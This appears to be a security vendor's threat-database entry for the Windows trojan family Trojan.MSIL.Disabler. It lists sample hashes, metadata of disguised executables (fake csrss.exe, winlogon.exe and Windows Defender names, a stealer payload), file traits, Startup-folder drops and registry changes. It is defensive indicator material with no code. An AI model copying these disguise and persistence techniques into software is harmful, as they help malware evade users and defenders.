Multi-License Discount Quote

Change Region

English
Threat Database Trojans Trojan.MSIL.Disabler

Trojan.MSIL.Disabler

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,168
Threat Level: 80 % (High)
Infected Computers: 2,297
First Seen: March 27, 2024
Last Seen: April 17, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.MSIL.Disabler
Signature status: No Signature

Known Samples

MD5: 2bbebdfcb09ce9148f6c00d1d12b9a25
SHA1: 10fd68701b10a571ca44c8d0548f23bda1377e48
File Size: 69.12 KB, 69120 bytes
MD5: 78dc724a4aef8d20aeb88fca540b4b34
SHA1: 594a17cd80133d717f4ec33c93342808e72c7af5
File Size: 32.26 KB, 32256 bytes
MD5: 828c3cfa5bf65c6ec73aa07b4174126e
SHA1: 55f4ab725fee8f31295570c21054712a1a6b92fe
File Size: 1.00 MB, 1003697 bytes
MD5: dc14cf29aa0131d968e28ef8038894c0
SHA1: 1a359fb0a762f012a9a3109d9dfabef1e8c55e8f
SHA256: CA82E5AF7DA3CDF376A2D4F2B49E95683EB5A2468F9EEABF1C80C99B2B17EEF2
File Size: 95.23 KB, 95232 bytes
MD5: 17c49e03197481471defac53321a0f44
SHA1: 25009ab696b0b58ec5caec2e7b1b510068dac202
SHA256: 721AB167BA3F5132FA1B8B9B8FB9329687FBBC2810828F02BE7B887E1A49FF20
File Size: 236.54 KB, 236544 bytes
Show More
MD5: 29f86841c1bcebfcc2403119256a25ba
SHA1: 782eb4adc9f910c57ebfc5c66e62c612a5fd678e
SHA256: FC4451A851CB702AF0B9785117B5105D2562E5C1CC1188F17043B7FA971CB8C1
File Size: 1.27 MB, 1270784 bytes
MD5: 8332823f173850ad182d80c02723cb3a
SHA1: 2a30825f027b64035138cd7387dab3407b789edd
SHA256: 2EE1531499B97F8817F181131EDDCEF536D5AB3FD6BBA2F8311F74FBD98C56E6
File Size: 562.15 KB, 562147 bytes
MD5: 61ddb6f5eb185b886f0cc54b76b229b4
SHA1: bac69a8f0a0b0e1aa2d586887ff13a58b3d97b64
SHA256: F6250570AA8B2259A5B69E440D1AF1B3E20650460B2BFAA2F35E0478039B0732
File Size: 2.90 MB, 2900992 bytes
MD5: 553d662114b9e8196b9bcba59807186c
SHA1: 15d51105574f1a6a0195563c7385db6f0b087d69
SHA256: F0BF3F6E8946B02E1B56339B26AD27677928AE4C4A3AEAE4B6EF6AA428AA8147
File Size: 2.23 MB, 2227712 bytes
MD5: f83f34f206a22f02428aa2560e34c827
SHA1: 4ecaecf6da408dbcaadd608ade91d4defe217c05
SHA256: 6F35AF2F592FCE75C3867C3D60F718E195A42BFC88772D22D26BC05760A4EE8A
File Size: 650.75 KB, 650752 bytes
MD5: 95a96f8e151ea62c58078f10c758f38d
SHA1: 229535cd7780450490d11297e0c0866f58227c49
SHA256: 0533F95F961B28EFB7B747DDE819E8400D515140CD0BEECD14F55AC9A9A1EBCD
File Size: 28.67 KB, 28672 bytes
MD5: e53e6e12dcdca3ed907effda92fe87a2
SHA1: 2451907384a6576f1506b203b8ace85fa195bfef
SHA256: EBA58DADF593812539659EBCDDB3D805269C82E4522D265F5696418C6868C239
File Size: 235.01 KB, 235008 bytes
MD5: 3de701b616974be979f07aa53c7f5bdc
SHA1: 0d3407f279363533f49ba022844522d29ab80063
SHA256: 198B3BCFA103248427CDBBEA6861948E73013672FE0B0F87245C8F08A5B154DB
File Size: 235.01 KB, 235008 bytes
MD5: 031919207eb53b6286980853959f0a7e
SHA1: 08a65c086e0796f3a0a5e5e81693cd81797262bb
SHA256: AE2A1D9FB0FD47090C27EFFAB31AFC88F8B553B4C11A735616C7D31288554345
File Size: 95.23 KB, 95232 bytes
MD5: ff3e8e57e1ae0f495fd21789990dce0c
SHA1: b1239be7c5eb05af91b1395215da9586415c5775
SHA256: DE8D88C8C6E17466EEBF2EC4CFF04F9EC63E811A1D56AE7C21BE10F2F144D296
File Size: 95.23 KB, 95232 bytes
MD5: 319a7eb05a0027580bf67eb9d4f0ef1e
SHA1: 35ae95e6a227f1ea8c15394fb5777d08ed60c48b
SHA256: F0DE3510F49ECEB0B85D05DB022AABB09313BF24A0F7F29FA0066275E426383E
File Size: 331.18 KB, 331176 bytes
MD5: 5915370cab81507a6bf1d45d406533c3
SHA1: 08d1c60d541af2bf5dd17b17940d6a15ae7f333a
SHA256: 4951A660004CF2B514B86F25B9F4094E06F2FFD5B76626D0B94E2E492F2468AB
File Size: 24.06 KB, 24064 bytes
MD5: f19fc60af8e56e93f5c5d72b147223b2
SHA1: b01311de15e56340d639951a21d013a0e65cb617
SHA256: 183A123967C0BCCF63C826C7EB704CDA1082631C1781983D1E3608078C3B679D
File Size: 9.16 MB, 9164288 bytes
MD5: d0ec0d63815b3b4c219d656440d5c431
SHA1: 36f6497ed5033820f878ad3b88dbe4d2c1cf7f23
SHA256: B59158B43B9F1DE3BD31D7298D5641814967C403D08209FEBCEE4B4B89957088
File Size: 2.54 MB, 2543929 bytes
MD5: 14f360753efb098a683c3fca7d72c1f6
SHA1: 4a6f434d8d4bcc8009b981f2ab27d978fe1d7bbb
SHA256: 1A246628903784B583E4EA206A4B01E02D3355F7BA458F5C976A4EA21E5DE543
File Size: 115.71 KB, 115712 bytes
MD5: acdf6d8b26bec15d77e4ebe2b2f51ef9
SHA1: ed892a43ea0f50c59e13d176efb890687897bce3
SHA256: F861354D92369A2B8404BBFE164D8063E0FB9D7F944F0E0043BA15518E125722
File Size: 3.35 MB, 3353088 bytes
MD5: 6ec43de6137d798b68ef0deaf421005a
SHA1: 991fd8fe6585f2abe665662951da0caf80dce051
SHA256: F641060F9C46E3216220E5B628799E66BCFD507345D6A2E4EDC0EE73B02AC98E
File Size: 46.59 KB, 46592 bytes
MD5: 170898ec930be70be5fc1e51fb0d1249
SHA1: c082e213566269e76b6b39f75971878cae4d4d6b
SHA256: 6C7116D931B6E7AFD86D8E1B29ABA0888FAF39D8DB0E4E23283E6EBE2D5F9B68
File Size: 179.71 KB, 179712 bytes
MD5: e6ee7cbd81dc1de4a84729f372c3a905
SHA1: 4bbecc330f0f12632d20c80c3a8ec419b636b868
SHA256: 801DACA1D77DBE0C6F93C51CA8E7DF746D5CA87F4514ED1F8B6246272CC5DA33
File Size: 219.65 KB, 219648 bytes
MD5: 5cda6d1a164ad8d37cfdee7b21963708
SHA1: 145b890c95edf221348f6c2187cc494ef25ad7d7
SHA256: 75F9D46DA9A104D904C0E1ACAF699744F0532F801D90C361FD30434D3B237718
File Size: 491.01 KB, 491008 bytes
MD5: d5a7b260a1faf0a399524c65bb28f335
SHA1: 8dab02a8419985d91949fd689a2c90d10a1539b8
SHA256: 02D6A9D09A42F5F2B5199E2A1D72C496DED6D028AC5D7FECCB26698778A5E352
File Size: 3.18 MB, 3183054 bytes
MD5: fc15fb0cec248ea16a6eda92ab97b1f8
SHA1: 01af6a8e81a92487ed29b9706ef8c86957666a45
SHA256: 73E71DC70F6DAEEBD9A257D0B0C6E67E87C6D50B27EB94AF08D15F1AFB6ED02C
File Size: 33.28 KB, 33280 bytes
MD5: 537f6a4be5da686484b29e09bc410055
SHA1: d09937b6a184c2c44977894b063c2f8fb90f664b
SHA256: F3C779557DEC8A142878C34972B25E513482BED4A0712F3216E2101AA9397101
File Size: 33.28 KB, 33280 bytes
MD5: 8ab6b08189247d639c4079a3fb65bc09
SHA1: a111941e14fd81897891ed710b1599cfd951f46c
SHA256: 143ABDB012D421DC81323A29A4218C98E0EC8C31AFC8EA3CE79A95B13FC14DE4
File Size: 3.68 MB, 3680256 bytes
MD5: f3fdc8a5aea79f1a79dd1f53766d5534
SHA1: df2b78d6c3509b1af05b8c09a117fe03a5d1fe4b
SHA256: 4081DFC0C3789A0A1540EA2BB5D163C2E7990284B3322FA4EF0E41B2999953B8
File Size: 95.23 KB, 95232 bytes
MD5: 4d6e3223769a5966ca3a485075f264d1
SHA1: b9700b2deb302a8aed4fbbcb3963c332c26ba69c
SHA256: E5B9D2AA0DADFB30AADDE256ED5B95A9B8B6D74816CEF7004E8CD3E3C8C01F14
File Size: 435.23 KB, 435232 bytes
MD5: a93cc99a408272bff99a348e54492e55
SHA1: 8d4580d01df210840e6d0a60f168cdc86c42f6f4
SHA256: D74A94B948F42B3F59A938F658A450A1707540B54FEB75E3CA4201FCE93FB6F2
File Size: 236.54 KB, 236544 bytes
MD5: 91ef134f9c1084cbb171d27992d82a88
SHA1: c449d36ed1a2617b12595ef55d3b41a817e69b5f
SHA256: 219415B583B4CFD3B369703BF13CB85C3662D1F85D8C93BF91FE21CBBEDCE254
File Size: 236.54 KB, 236544 bytes
MD5: 1c2e67ea15123b8d78b02d8bd3226f5b
SHA1: 8da30782988c0ac87fdd027ddaebc9a233d48aa7
SHA256: A8348103C0ED694B867CCD43616C7B00F894ABDEB277CBFE3FDBA400DDDFEBAF
File Size: 2.87 MB, 2865152 bytes
MD5: 91f648f2a7aa9d43d0be659fc66742de
SHA1: d5296070848ea8ebd7b149f79dc6cead04e7d9fa
SHA256: 33BA1B08C25B878462292A3C5116773DBC7C03C1E05E8FD92CB300FA33E80648
File Size: 3.85 MB, 3854336 bytes
MD5: 5e22e46514a6edee41d81b19b9f786b1
SHA1: faa529456eaf475fa34533bc3a9f36467197acf7
SHA256: A46B50C135B9C587B3C3406923E457A7C0AA291D3F415CA15674CB7383FCE7FF
File Size: 278.53 KB, 278528 bytes
MD5: 13262804ba63842db2399d6e1f1a410d
SHA1: 09a99acf1fb716fca9962bfa2be8dd8203589283
SHA256: 2B13DC9FA80AA7AE0838AE0AEB7E4A279F90BCC8764F00A7B6F6930FB8DB0C94
File Size: 61.95 KB, 61952 bytes
MD5: 27b8ca9dfb1315327a12f62c25ef5ee6
SHA1: ca8a10f9a525fcbc2f5e0ee380893fb765944afe
SHA256: 1407726C4A4E765709EBA188B616B4FB84CDA8801E167F64D426CD2955B89A18
File Size: 7.03 MB, 7025664 bytes
MD5: 8448a16e8a79c2fa3f0b0d61babe3667
SHA1: 26fed7480392eafe76f4a844a6ba47492b8d0788
SHA256: 9EB3E3EAF5B3D22213E542E09D1C269698ED794B386B1AA2FDBC3672FAB3CFB9
File Size: 55.81 KB, 55808 bytes
MD5: 24fbdba7ba1dc98c96e53a559d4cd5c5
SHA1: 5de105c22d3d342226e63fa7a19c18daf4879c3c
SHA256: D4DAE5C87B3C28589215C52A7448729BEA41FD594C792F4D82969E7E182765C0
File Size: 531.82 KB, 531824 bytes
MD5: 61ebede3851d1fe194b691649b0c30a1
SHA1: 822474532552558e90000051e3f750ae7d766a65
SHA256: 1D0D5239C1B83361DAD5B8F8CE41FA0A17A9B59DF52929D6BF51E2CEC58CD045
File Size: 2.01 MB, 2012160 bytes
MD5: 8f2f822f46e95d14520530c34988be15
SHA1: 76a38d6844895bc102bf3dc9b87db06b3136c1b0
SHA256: B86A4B5DC82D07AF27EA9D7B8099CBC7F7AD7FBEFD5CE73D0F3D718D8A6ED23A
File Size: 9.32 MB, 9324323 bytes
MD5: c4c139b161786e590b6f4a0e6007f43b
SHA1: 93d73944f5277b4e4b47923084938306dce62913
SHA256: D22DC97FE805711A74ACECB0A49012A5662DAF8B988724926F3613612AF6D017
File Size: 41.47 KB, 41472 bytes
MD5: 15acc638460977206abf0f2803e88151
SHA1: c8eaaef22e876b1e5a3094a0ca1c986e52287bad
SHA256: E232763160A4C2307779F80CFB53396092D1BD040FBEA42DC43506E7BCBAA072
File Size: 41.47 KB, 41472 bytes
MD5: 1538a4507b6795038102092b8087b5cb
SHA1: 67d705d3ddd599903ee64210eeb5a944da67c178
SHA256: CD41746F31038E2A6B06078D194D87AB347AEFCF3EB355F33E9A83AE41F6CBE0
File Size: 781.82 KB, 781824 bytes
MD5: 3996e651e101079f06e9cbe08ccdf05c
SHA1: 083e3213ca9ccd9f000e50df508fea935ca68a4b
SHA256: 66E23605D449D0FC018BAB8F1CC22006911FDDC93A07F10AA05A4513EAA5351B
File Size: 39.42 KB, 39424 bytes
MD5: 221e372196ad28662cd5494c10e3e6e9
SHA1: 839fa4349c4de43003e40fa4c64d316b2dc10737
SHA256: D2E85B6EE82F8045FFF9F5EB6809DC90CC135AF673A5E11CB0B3873BCE231E86
File Size: 1.41 MB, 1405952 bytes
MD5: 918951c4657e9cdf39ac1b275bfd2e95
SHA1: 7323e59b2c4d60b6639bfcba11f4c02bcb94e347
SHA256: B50D25C24BA5F1F096E883B3A9970D2C080AFB37DFE2F55A25A1C7ED3CA36505
File Size: 3.45 MB, 3450400 bytes
MD5: 423380e0d178321dcd91ab2695718046
SHA1: 35d9fb2e55895261666336bfe935c9bd8814f19e
SHA256: 5882E12630E944227CEF473FA9CE28263871A877259DB9B5F9A87979578CE41C
File Size: 49.66 KB, 49664 bytes
MD5: a2161c9586502da00919aafbd56ffb56
SHA1: 42c079dde3b84fd6eb3bbadb4847d1c9a29f26df
SHA256: D2DB66444B33AFF9EC77EDFBEF9596C9B057B5047D78EC6AF30993B4837B0D5C
File Size: 132.61 KB, 132608 bytes
MD5: e188202501f604ebe866db32d71fc96e
SHA1: d05390280526c4e85f11f7bbc3048427717fff71
SHA256: 14836742584BAD1349E287621A201C032E4E699A883136BD3E1774A807894C45
File Size: 69.12 KB, 69120 bytes
MD5: ace8d776d5ba401143732d7a22e5f389
SHA1: de53b98c2ff8d9d6fd6e4fca09005f73160f0006
SHA256: B175ACDEA607F203346F7F871F7DFA8C439389B157CE80DF321369536A6BF9EA
File Size: 1.13 MB, 1134080 bytes
MD5: 58fdbeedd845dfc5b330d33635eb1b35
SHA1: 2e9b6220b931412671b4c9dd2795a1935429f9b4
SHA256: 0ED3031CE41FB95CC13050E8A53DD58E7A4901511ECBA134242B07C085AFCC6D
File Size: 3.17 MB, 3171328 bytes
MD5: a63bbfbc39a138a5427bd083d0ac1957
SHA1: b0dcbacd80fac6b29af812b4b682116e17c230b7
SHA256: 0D52A001635C0459EEFB82D827E496452D679C1507F97908839116C30EA11329
File Size: 41.47 KB, 41472 bytes
MD5: b505b7f69928ee284200fec664240c97
SHA1: 28cfb30f32061bd008fd3baca7df620ad33215e3
SHA256: 0FA681978C4FF141B133E0F0F5A4AD7A786603687F563BFFE23355E5774CBA3D
File Size: 2.22 MB, 2223239 bytes
MD5: 8b928f22138afcf3a28010026d064808
SHA1: abd228d1794c0147fad6bd0612605d6b0d6174d0
SHA256: 8CDBF8B3711BA9E6C14EFCE4BCC71B7AE4C515A581E6C734CF37EF6CC5F2AA7E
File Size: 7.12 MB, 7122944 bytes
MD5: 03898be29fb6c5464b28ae0239713b7b
SHA1: a89158fe7d762dca8f136498a4120e3597933cab
SHA256: F30F32937999ABE4FA6E90234773E0528A4B2BD1D6DE5323D59AC96CDB58F25D
File Size: 520.70 KB, 520704 bytes
MD5: 7af176fc586018179b06d3fae3a2afa8
SHA1: 9030b9fec592a1b44f60a50761fed2f9c5d87ba7
SHA256: BEE44138F6F337FE334A0467F5D7FCC764755C4DC34AE4878064012DB9C1C952
File Size: 16.38 KB, 16384 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is .NET application
  • File is 32-bit executable
Show More
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Show More

41 additional icons are not displayed above.

Windows PE Version Information

Name Value
Assembly Version
  • 2025.4.1.2
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 5.3.23.900
  • 5.2.46.2
  • 4.20.3.0
  • 2.0.0.62
Show More
  • 1.5.2.0
  • 1.3.7.0
  • 1.0.6.1
  • 1.0.0.0
  • 0.0.0.0
Assembly Version 0.0.0.0
Comments
  • 4winkey_pf
  • Launcher Premium GamesWteam
  • Main Immersed Agent .NET Component
  • Payload file for Umbral Stealer.
  • Payload for Umbral Stealer
  • Perfect Windows 10 & 11 setup with essential settings for maximum convenience
  • Program for the GTAV Speedrunning Community
  • This installation was built with Inno Setup.
  • True Mining Desktop Mining Software
Company Name
  • Abelssoft
  • GamesWteam
  • Haerubot
  • Hammer
  • HeroesVLobby
  • Immersed
  • KorepiLauncher
  • LSI Software S.A.
  • Magnet Forensics® Inc.
  • Microsoft Corporation
Show More
  • optimizerDuck
  • Project 1.27 Inc.
  • SpiidXP
  • True Mining
  • velocityfixer
File Description
  • 4winkey_pf
  • Client Server Runtime Process
  • Crysome.Client
  • csrss
  • Fix Eternity
  • FolderExcluder
  • Free, open-source Windows optimization tool for performance, privacy, and simplicity.
  • GastroServiceTool
  • GTweak
  • Haerubot
Show More
  • Hammer
  • HeroesVLobby
  • Immersed Agent GUI
  • InstaladorProsepagoNet
  • KorepiLauncher
  • Launcher MuOnline
  • luncher rayman aréna
  • Magnet AXIOM Process
  • Microsoft Edge Update
  • Project 127
  • ShellHost
  • sk_Drever
  • SN_Changer
  • SpiidXP
  • SSD Fresh
  • True Mining Desktop
  • velocityfixer
  • WarRock Montana Installer
File Version
  • 2025.4.1.2
  • 15.01.61691
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 5.3.23.900
  • 5.2.46.2
  • 4.20.3
Show More
  • 2.0.0.62
  • 1.5.2.0
  • 1.3.133.5
  • 1.3.7
  • 1.0.6.1
  • 1.0.0.3
  • 1.0.0.0
  • 0.0.0.0
Internal Name
  • 4winkey_pf.exe
  • AntidoteTool.exe
  • AXIOMProcess.exe
  • CPLApplet.dll
  • Crysome.Client.exe
  • csrss.exe
  • DrivessUbuntu
  • Fix Eternity.exe
  • FolderExcluder.exe
  • GastroServiceTool.exe
Show More
  • GTweak.exe
  • Haerubot.dll
  • Hammer.dll
  • HeroesVLobby.dll
  • Immersed.exe
  • InstaladorProsepagoNet.exe
  • KorepiLauncher.dll
  • LauncherGamesWteam.exe
  • Loader.exe
  • Manutenção.exe
  • Microsoft Edge Update
  • optimizerDuck.dll
  • PedalDownloader.exe
  • Project 1.27.exe
  • Ra_deo.exe
  • Realtek HD Audio Universal Service.exe
  • ShellHost.exe
  • SK_DRIVER.exe
  • SN Changer.exe
  • SpiidXP.dll
  • Steal2.exe
  • Stub.exe
  • TGX.dll
  • True Mining Desktop.dll
  • Update.exe
  • v31.exe
  • velocityfixer.dll
  • WarRock Installer.exe
  • winlogon.exe
  • XWormClient.exe
Language Id sr-Cyrl-RS
Legal Copyright
  • 4winkey_pf © 2023
  • Copyright (C) 2019-2023 True Mining
  • Copyright Microsoft Corporation
  • Copyright © 1907
  • Copyright © 2017 ~ 2025
  • Copyright © 2018
  • Copyright © 2019 Immersed Inc. All rights reserved.
  • Copyright © 2020
  • Copyright © 2022
  • Copyright © 2024
Show More
  • Copyright © 2025
  • Copyright © LSI Software S.A. 2025
  • Copyright © Magnet Forensics Inc. 2024
  • Copyright © WarRock Montana 2025
  • © 2024-2025 Greedeks
  • © Abelssoft, Inc.
  • © Microsoft Corporation. All rights reserved.
  • 파이널판타지14 KR 해루@모그리
Legal Trademarks
  • 4winkey_pf
  • GamesWteam
  • Greedeks
  • Project 1.27 TradeMark
Original Filename
  • 4winkey_pf.exe
  • AntidoteTool.exe
  • AXIOMProcess.exe
  • CPLApplet.dll
  • Crysome.Client.exe
  • csrss.exe
  • DrivessUbuntu
  • Fix Eternity.exe
  • FolderExcluder.exe
  • GastroServiceTool.exe
Show More
  • GTweak.exe
  • Haerubot.dll
  • Hammer.dll
  • HeroesVLobby.dll
  • Immersed.exe
  • InstaladorProsepagoNet.exe
  • KorepiLauncher.dll
  • LauncherGamesWteam.exe
  • Loader.exe
  • Manutenção.exe
  • msedgeupdate.dll
  • optimizerDuck.dll
  • PedalDownloader.exe
  • Project 1.27.exe
  • Ra_deo.exe
  • Realtek HD Audio Universal Service.exe
  • ShellHost.exe
  • SK_DRIVER.exe
  • SN Changer.exe
  • SpiidXP.dll
  • Steal2.exe
  • Stub.exe
  • TGX.dll
  • True Mining Desktop.dll
  • Update.exe
  • v31.exe
  • velocityfixer.dll
  • WarRock Installer.exe
  • winlogon.exe
  • XWormClient.exe
Product Name
  • 4winkey_pf
  • Crysome.Client
  • csrss
  • Fix Eternity
  • FolderExcluder
  • GastroServiceTool
  • GTweak
  • Haerubot
  • Hammer
  • HeroesVLobby
Show More
  • Immersed Agent
  • InstaladorProsepagoNet
  • KorepiLauncher
  • Launcher - GamesWteam
  • luncher rayman aréna
  • Magnet AXIOM Process
  • Microsoft Edge Update
  • Microsoft® Windows® Operating System
  • optimizerDuck
  • Project 127
  • sk_Drever
  • SN_Changer
  • SpiidXP
  • SSD Fresh
  • True Mining Desktop
  • velocityfixer
  • WarRock Montana Installer
Product Version
  • Build: 5.3.1
  • Build: 5.2.5
  • 2025.4.1.2
  • 15.01.61691
  • 11.6.0.0
  • 10.0.26100.6725
  • 8.4.1.0
  • 8.3.0.41085
  • 6.2.22621.1
  • 4.20.3
Show More
  • 2.0.0.62
  • 1.5.2.0
  • 1.3.133.5
  • 1.3.7+54db88b8f7971ce378ccb54aa257701c63f8e303
  • 1.0.0.3
  • 1.0.0.0
  • 1.0.0+d6d9fd5815cf8001a72523a99eff99b731e7b391
  • 1.0.0
  • 0.0.0.0
Upstream Version 1.3.99.0

Digital Signatures

Signer Root Status
Raecomm Services Ltd SSL.com Root Certification Authority RSA Root Not Trusted

File Traits

  • .NET
  • 2+ executable sections
  • Agile.net
  • big overlay
  • CreateThread
  • CryptUnprotectData
  • dll
  • Fody
  • Gdrive
  • HighEntropy
Show More
  • Installer Manifest
  • Installer Version
  • NewLateBinding
  • No CryptProtectData
  • No Version Info
  • ntdll
  • RAR (In Overlay)
  • RARinO
  • RijndaelManaged
  • Run
  • vmp section variant
  • WinRAR SFX
  • WRARSFX
  • WriteProcessMemory
  • x64
  • x86

Block Information

Total Blocks: 23
Potentially Malicious Blocks: 0
Whitelisted Blocks: 2
Unknown Blocks: 21

Visual Map

? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? ? 0 ?
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • MSIL.AsyncRAT.L
  • MSIL.Gamehack.BYJ
  • MSIL.Krypt.UJB

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134123407543776595.7060.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134199996858702057.3888.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\recovery\oem\xjd9xk95u1hy.exe Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr Synchronize,Write Attributes
c:\users\user\appdata\local\microsoft\clr\conhost.exe Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\clr\conhost.exe Synchronize,Write Attributes
Show More
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\1234.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\3.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_54qjub0j.jgm.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_a03gpzsk.by0.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_mawq4l2x.end.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_s3femh4g.hgm.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\crysome_debug.log Generic Write,Read Attributes
c:\users\user\appdata\local\temp\dis.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-8jn9p.tmp\_isetup\_setup64.tmp Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-jh3nh.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\realtek hd audio universal service.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\sam x222c#.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\server.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\windows defender real time protection.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\winter.bll Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\unins000.dat Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\sysaudio.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe Generic Write,Read Attributes
c:\users\user\appdata\roaming\microsoft\windows\runtimebroker.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Data,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe Generic Write,Read Data,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\fc4788cecfc243df96ba2d9ed7c5cd02.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\server.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\server.exe Synchronize,Write Attributes
c:\users\user\appdata\roaming\svchost.exe Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\svchost.exe Synchronize,Write Attributes
c:\users\user\downloads\__tmp_rar_sfx_access_check_79765 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\downloads\joliehack.exe Generic Write,Read Attributes
c:\users\user\downloads\joliehack.exe Synchronize,Write Attributes
c:\users\user\downloads\tt.pdf Generic Write,Read Attributes
c:\users\user\downloads\tt.pdf Synchronize,Write Attributes
c:\windows\appcompat\programs\amcache.hve Read Data,Read Control,Write Data
c:\windows\appcompat\programs\amcache.hve Write Attributes
c:\windows\appcompat\programs\amcache.hve.log1 Read Data,Write Data
c:\windows\appcompat\programs\amcache.hve.log2 Read Data,Write Data

Registry Modifications

Key::Value Data API Name
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
Show More
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
